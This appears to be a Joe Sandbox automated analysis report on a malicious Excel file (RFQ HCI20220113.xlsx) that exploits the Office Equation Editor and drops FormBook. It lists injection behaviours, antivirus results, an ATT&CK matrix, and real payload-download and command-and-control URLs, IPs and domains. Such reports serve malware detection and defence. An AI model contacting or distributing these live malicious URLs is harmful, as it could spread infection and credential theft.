            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\Public\vbc.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 1764Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
            Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
            Source: explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpBinary or memory string: ProgmanG
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.37b2e80.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.375be60.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.520461002.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481792338.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.511908771.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520506272.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686600488.0000000000690000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.481476255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686491599.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.503980554.000000000921C000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.520415665.0000000000260000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.489221730.0000000003619000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.686548955.0000000000430000.00000040.00020000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools11LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information4Cached Domain CredentialsSystem Information Discovery113VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 552850 Sample: RFQ HCI20220113.xlsx Startdate: 13/01/2022 Architecture: WINDOWS Score: 100 36 www.norfg.com 2->36 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 18 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 33 25 2->15         started        signatures3 process4 dnsIp5 44 198.23.213.59, 49167, 80 AS-COLOCROSSINGUS United States 10->44 30 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->30 dropped 32 C:\Users\Public\vbc.exe, PE32 10->32 dropped 78 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->78 17 vbc.exe 1 5 10->17         started        34 C:\Users\user\...\~$RFQ HCI20220113.xlsx, data 15->34 dropped file6 signatures7 process8 signatures9 46 Antivirus detection for dropped file 17->46 48 Multi AV Scanner detection for dropped file 17->48 50 Machine Learning detection for dropped file 17->50 52 2 other signatures 17->52 20 vbc.exe 17->20         started        process10 signatures11 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process12 dnsIp13 38 ecommerceoptimise.com 192.185.98.251, 49172, 80 UNIFIEDLAYER-AS-1US United States 23->38 40 terapiaholisticaemformacao.com 216.172.160.188, 49171, 80 UNIFIEDLAYER-AS-1US United States 23->40 42 8 other IPs or domains 23->42 70 System process connects to network (likely due to code injection or exploit) 23->70 27 cmd.exe 23->27         started        signatures14 process15 signatures16 72 Modifies the context of a thread in another process (thread injection) 27->72 74 Maps a DLL or memory area into another process 27->74 76 Tries to detect virtualization through RDTSC time measurements 27->76

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            RFQ HCI20220113.xlsx34%VirustotalBrowse
            RFQ HCI20220113.xlsx30%ReversingLabsDocument-Office.Exploit.CVE-2017-11882

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\vbc.exe100%AviraHEUR/AGEN.1211287
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%AviraHEUR/AGEN.1211287
            C:\Users\Public\vbc.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe44%ReversingLabsByteCode-MSIL.Trojan.Bulz
            C:\Users\Public\vbc.exe44%ReversingLabsByteCode-MSIL.Trojan.Bulz

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.400000.9.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.11a0000.2.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.6.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.8.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.1.unpack100%AviraHEUR/AGEN.1211287Download File
            5.2.vbc.exe.11a0000.4.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.0.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.10.unpack100%AviraHEUR/AGEN.1211287Download File
            4.0.vbc.exe.11a0000.0.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.400000.7.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.vbc.exe.11a0000.3.unpack100%AviraHEUR/AGEN.1211287Download File
            5.0.vbc.exe.11a0000.4.unpack100%AviraHEUR/AGEN.1211287Download File
            4.2.vbc.exe.11a0000.2.unpack100%AviraHEUR/AGEN.1211287Download File

            Domains

            SourceDetectionScannerLabelLink
            www.norfg.com0%VirustotalBrowse
            terapiaholisticaemformacao.com4%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://java.sun.com0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://198.23.213.59/1155/vbc.exe100%Avira URL Cloudmalware
            http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==0%Avira URL Cloudsafe
            http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw==0%Avira URL Cloudsafe
            http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmr0%Avira URL Cloudsafe
            http://www.%s.comPA0%URL Reputationsafe
            www.topeasyip.company/i5nb/100%Avira URL Cloudmalware
            http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw==0%Avira URL Cloudsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe
            http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmr0%Avira URL Cloudsafe
            http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ecommerceoptimise.com
            		192.185.98.251
            		truetrue
              		unknown
              www.norfg.com
              		43.134.0.76
              		truefalseunknown
              terapiaholisticaemformacao.com
              		216.172.160.188
              		truetrueunknown
              www.circlessalaries.com
              		195.211.74.112
              		truetrue
                		unknown
                www.ylhwcl.com
                		122.10.28.11
                		truetrue
                  		unknown
                  www.bjbwx114.com
                  		23.80.120.93
                  		truetrue
                    		unknown
                    www.integratedheartspsychology.com
                    		221.121.143.148
                    		truetrue
                      		unknown
                      www.orphe.biz
                      		103.224.212.220
                      		truetrue
                        		unknown
                        www.terapiaholisticaemformacao.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.topeasyip.company
                          		unknown
                          		unknowntrue
                            		unknown
                            www.ecommerceoptimise.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://198.23.213.59/1155/vbc.exetrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.orphe.biz/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=oQMs787eFXVjqrc0kpDhsTH4zTzevw4glhch4r9T7Ws8YTYXIREY3A8O8bSOutLAC2pWew==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ecommerceoptimise.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=Sj6KkXOpjD24waER2SO9qkxuDKT2nEessjMBu43SnBr3kTZ7jjbG3Rbf9Jyaa70FTQT3zw==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.integratedheartspsychology.com/i5nb/?7nqdxT7p=XDk63H3qWl+RMbiQoIY1xy2xxu1qCgv9HRxghgT+pSptcjNmJSn834JM0tAFFJwKE7XnKA==&hPGx3Z=4ha06H5pmrtrue
                              • Avira URL Cloud: safe
                              		unknown
                              www.topeasyip.company/i5nb/true
                              • Avira URL Cloud: malware
                              		low
                              http://www.bjbwx114.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=0CWnzW05hIAETNGkljJOZJd5wMvHMv5oC+B2C7oDP+/j/H/Y+u+MlAecVwZThd0hAeRTKw==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.circlessalaries.com/i5nb/?7nqdxT7p=deof+8h2cV1ZhVyhzrGI39GlLFFvVq6Cbv4jXvKqou5r7IRZVEd6lg8tdgMKHVBHJLPsEg==&hPGx3Z=4ha06H5pmrtrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ylhwcl.com/i5nb/?hPGx3Z=4ha06H5pmr&7nqdxT7p=1q0oPF09A/aJAPsKPuHQBkHWjjwJ/Gn81frD7rqKWOkW4wBsfhpWEnMiYvQLBvsNHCkSDA==true
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpfalse
                                		high
                                http://www.windows.com/pctv.explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://java.sun.comexplorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://investor.msn.comexplorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                    		high
                                    http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                      		high
                                      http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://investor.msn.com/explorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                          		high
                                          http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.509280979.0000000004513000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.%s.comPAexplorer.exe, 00000006.00000000.506237385.0000000001BE0000.00000002.00020000.sdmpfalse
                                            • URL Reputation: safe
                                            		low
                                            http://www.autoitscript.com/autoit3explorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              https://support.mozilla.orgexplorer.exe, 00000006.00000000.498056814.0000000000255000.00000004.00000020.sdmpfalse
                                                		high
                                                http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.530481363.0000000002CC7000.00000002.00020000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.hotmail.com/oeexplorer.exe, 00000006.00000000.490268538.0000000002AE0000.00000002.00020000.sdmpfalse
                                                  		high
                                                  http://servername/isapibackend.dllexplorer.exe, 00000006.00000000.501432004.0000000003E50000.00000002.00020000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  103.224.212.220
                                                  		www.orphe.bizAustralia
                                                  		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                  221.121.143.148
                                                  		www.integratedheartspsychology.comAustralia
                                                  		45671AS45671-NET-AUWholesaleServicesProviderAUtrue
                                                  216.172.160.188
                                                  		terapiaholisticaemformacao.comUnited States
                                                  		46606UNIFIEDLAYER-AS-1UStrue
                                                  23.80.120.93
                                                  		www.bjbwx114.comUnited States
                                                  		395954LEASEWEB-USA-LAX-11UStrue
                                                  195.211.74.112
                                                  		www.circlessalaries.comNetherlands
                                                  		51696ANTAGONIST-ASNLtrue
                                                  122.10.28.11
                                                  		www.ylhwcl.comHong Kong
                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKtrue
                                                  198.23.213.59
                                                  		unknownUnited States
                                                  		36352AS-COLOCROSSINGUStrue
                                                  192.185.98.251
                                                  		ecommerceoptimise.comUnited States
                                                  		46606UNIFIEDLAYER-AS-1UStrue

                                                  General Information

                                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                                  Analysis ID:552850
                                                  Start date:13.01.2022
                                                  Start time:20:20:36
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 11m 41s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Sample file name:RFQ HCI20220113.xlsx
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                  Number of analysed new started processes analysed:8
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:1
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.troj.expl.evad.winXLSX@7/18@9/8
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 30.5% (good quality ratio 28.1%)
                                                  • Quality average: 67.3%
                                                  • Quality standard deviation: 31.4%
                                                  HCA Information:
                                                  • Successful, ratio: 99%
                                                  • Number of executed functions: 127
                                                  • Number of non-executed functions: 29
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .xlsx
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  Show All
                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  20:21:46API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                  20:21:49API Interceptor76x Sleep call for process: vbc.exe modified
                                                  20:22:12API Interceptor171x Sleep call for process: cmd.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  103.224.212.220Payment Instruction Copy.docGet hashmaliciousBrowse
                                                  • www.qdsinoer.com/g0c6/?MTd84=ZTCxuJUuTg3ujjQMDG9R/Bsg2l38vo66ZmtQwmUJhoOLg5Jn6qJnCadUSsHPyJ01LsMfCw==&yFQ0i=ol-lxfoh9zxTi
                                                  77isbA5bpi.exeGet hashmaliciousBrowse
                                                  • www.introlly.com/scb0/?Dx=5jUHwDF8mJkPD&HJE=ozFxTxbAL9SlKBWKm8YgwhFjuNT27iprJP7NHL8+HGhhNKlwLoXPt/8Q1gLYeUUkA6S6
                                                  piPvSLcFXV.exeGet hashmaliciousBrowse
                                                  • www.a9d7c19f0282.com/yrcy/?aT_=dhui3QyNJWrrZ0CvO1JA5VGSy98ZN/jZ+YnCPf+IKh+vL1tKqUPndupODu3ozmk2o5sJw6HQjQ==&9r0ld4=HdlpdHOX
                                                  rfq.exeGet hashmaliciousBrowse
                                                  • www.paper2code.com/s2qi/?MhBd9XLx=ZS7A4m/8Zm0TCkScZHra74OaamfJwW0MkEj9SlQz61HjIOTvDgAEnUIlLw2WdqxlOGxE&7nPPK=KjVHu8Kp0VVlY
                                                  goGZ1Tg0WT.exeGet hashmaliciousBrowse
                                                  • www.introlly.com/scb0/?5jU=1bC4qz&IFQtM=ozFxTxbAL9SlKBWKm8YgwhFjuNT27iprJP7NHL8+HGhhNKlwLoXPt/8Q1gLYeUUkA6S6
                                                  RFQ - JAKOB SELMER_pdf.exeGet hashmaliciousBrowse
                                                  • www.bettersalud.info/xc52/?pPz4=piwM+Tg1XWdF8JXj6m9M60gIgOiqzOMYoQespL+Ukhkn+7egdsm+Lnnze2nvXmx9E543&SpNH=LFQPjVRhlXLX5rn0
                                                  Quote request.exeGet hashmaliciousBrowse
                                                  • www.paper2code.com/s2qi/?TJELpfLP=ZS7A4m/8Zm0TCkScZHra74OaamfJwW0MkEj9SlQz61HjIOTvDgAEnUIlLw2WdqxlOGxE&lZwxYz=y6AldH-
                                                  company business card (2).exeGet hashmaliciousBrowse
                                                  • www.paper2code.com/s2qi/?8pAlAtp=ZS7A4m/8Zm0TCkScZHra74OaamfJwW0MkEj9SlQz61HjIOTvDgAEnUIlLw2WdqxlOGxE&q0=1bOH-4J
                                                  Comanda_0065947199 STIL SRL.xlsxGet hashmaliciousBrowse
                                                  • www.a9d7c19f0282.com/yrcy/?6lA=dhui3QyIJRrvZkOjM1JA5VGSy98ZN/jZ+Y/STciJOB+uLEBMtEerLqRMAI3urH8+kPYopA==&7nfTw=MpU4NjEhbdldg
                                                  siam.exeGet hashmaliciousBrowse
                                                  • www.portjob63.com/w240/?IR-=xsLY0uU/ruB2Wo6f/DZFUXOumcLvHhFSbAFA2SiGH3GGvhFhG7hYbQduighzLvXbeey7&3fKPsp=3ft4W8hx_dZpD
                                                  solicitud de presupuesto.exeGet hashmaliciousBrowse
                                                  • www.portjob63.com/w240/?5jPH=xsLY0uU/ruB2Wo6f/DZFUXOumcLvHhFSbAFA2SiGH3GGvhFhG7hYbQduighZUfnbac67&mFQtz=0JBl5rt0hVF0
                                                  DcgPw20VOI.exeGet hashmaliciousBrowse
                                                  • www.introlly.com/scb0/?n48lelN=ozFxTxbAL9SlKBWKm8YgwhFjuNT27iprJP7NHL8+HGhhNKlwLoXPt/8Q1gLyBkkkE4a6&5j=8pSxZb30
                                                  90k New Order.exeGet hashmaliciousBrowse
                                                  • www.pitmaster.pro/hsan/?5juhLd_=ybhVO97YxGnH+F+JSPE1t9KIIutIXfDbq1AVEGJF+TipYngFJaioS1KMOdQCUzDumjlm&-Zp09=z2JxXnPhIZqDSVW
                                                  slot Charges.exeGet hashmaliciousBrowse
                                                  • www.pensje.net/u8nw/?iL3=16ymbWhttvCifHgum1Ry7TYBI7Z9riB3DddqQjDqBvRBgg+fabStlOO0SL73yAolEQZ0980nog==&z6A=7n3h7JeH
                                                  cks.exeGet hashmaliciousBrowse
                                                  • www.pensje.net/u8nw/?f0=16ymbWhttvCifHgum1Ry7TYBI7Z9riB3DddqQjDqBvRBgg+fabStlOO0SL7OtxImKGFz980g7Q==&6l6x=E4ClVdU
                                                  yx8DBT3r5r.exeGet hashmaliciousBrowse
                                                  • kvnysoho.com/eHafFT.php?g=xl59elj25q8m
                                                  FastDownload.exeGet hashmaliciousBrowse
                                                  • www.premiumsave.info/installmate/php/track_installer_products.php
                                                  Breve-Tufvassons sp.o.o.o Company Profile And Bout Us.exeGet hashmaliciousBrowse
                                                  • www.floridapremierestates.com/utau/?Bb=hvLHMnt8_00&FZW42RP=0GAew6gAMmy7wZTXUoCRyObOPANIeGS2yPwbX0PNq+kmmXqt7uRcYA7Lv3IxMlWbqYDcq9qcfQ==
                                                  PROFORMA C20201009.exeGet hashmaliciousBrowse
                                                  • www.ennty.com/t4vo/?AdsdIhj=T2D4F6JwguKBUZ5S6SQbVzgK+h/PLJmJqrPSdYr1926l8barCuFU4DFVu13VBFUPoVEn&0rn=TN6xlffxOb

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  www.ylhwcl.comTax payment invoice - Wed, November 10, 2021,pdf.exeGet hashmaliciousBrowse
                                                  • 122.10.28.11
                                                  Vergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exeGet hashmaliciousBrowse
                                                  • 122.10.28.11
                                                  www.bjbwx114.comihJ4eSV1of.exeGet hashmaliciousBrowse
                                                  • 23.80.120.93
                                                  www.norfg.comihJ4eSV1of.exeGet hashmaliciousBrowse
                                                  • 43.134.0.76

                                                  ASN

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  AS45671-NET-AUWholesaleServicesProviderAUx86Get hashmaliciousBrowse
                                                  • 117.20.6.40
                                                  tBIZ9KD0zWGet hashmaliciousBrowse
                                                  • 202.60.82.31
                                                  ltOWLF06E2Get hashmaliciousBrowse
                                                  • 118.127.29.12
                                                  0kF6H2MsJsGet hashmaliciousBrowse
                                                  • 203.132.12.143
                                                  mR5mBE22FnGet hashmaliciousBrowse
                                                  • 117.20.6.68
                                                  lomlnzfgJ3Get hashmaliciousBrowse
                                                  • 188.209.158.169
                                                  8BIKTv5wXrGet hashmaliciousBrowse
                                                  • 202.60.94.154
                                                  Jx35I5pwgdGet hashmaliciousBrowse
                                                  • 202.60.69.88
                                                  ncMG8wu5IGGet hashmaliciousBrowse
                                                  • 27.50.93.163
                                                  VUUGP65515Get hashmaliciousBrowse
                                                  • 117.20.6.84
                                                  UcvrbDcXxRGet hashmaliciousBrowse
                                                  • 202.60.69.94
                                                  oiHTZaiKnIGet hashmaliciousBrowse
                                                  • 118.127.42.15
                                                  BitmCvTrdOGet hashmaliciousBrowse
                                                  • 202.60.94.153
                                                  Z7QqCH0bakGet hashmaliciousBrowse
                                                  • 202.60.94.177
